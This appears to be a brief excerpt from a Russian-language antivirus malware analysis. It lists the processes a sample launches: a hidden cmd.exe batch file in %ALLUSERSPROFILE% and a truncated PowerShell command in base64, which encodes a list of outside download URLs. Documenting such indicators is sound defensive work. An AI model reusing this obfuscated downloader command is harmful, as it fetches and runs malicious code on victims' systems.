Техническая информация
- '<SYSTEM32>\cmd.exe' /c %ALLUSERSPROFILE%\uwdhx.bat
- %ALLUSERSPROFILE%\uwdhx.bat
- '<SYSTEM32>\cmd.exe' /c %ALLUSERSPROFILE%\uwdhx.bat' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc JABzAHQAcgBzAD0AIgBoAHQAdABwADoALwAvAGYAbwByAHQAYwBvAG0AZgB1AHIAbgBpAHQAdQByAGUALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBDAGoAbABGAGwASgBKAGIAdwBaAEkANgBWAGcARgBNAGoALwAsAGgAdAB0AHAAcwA6...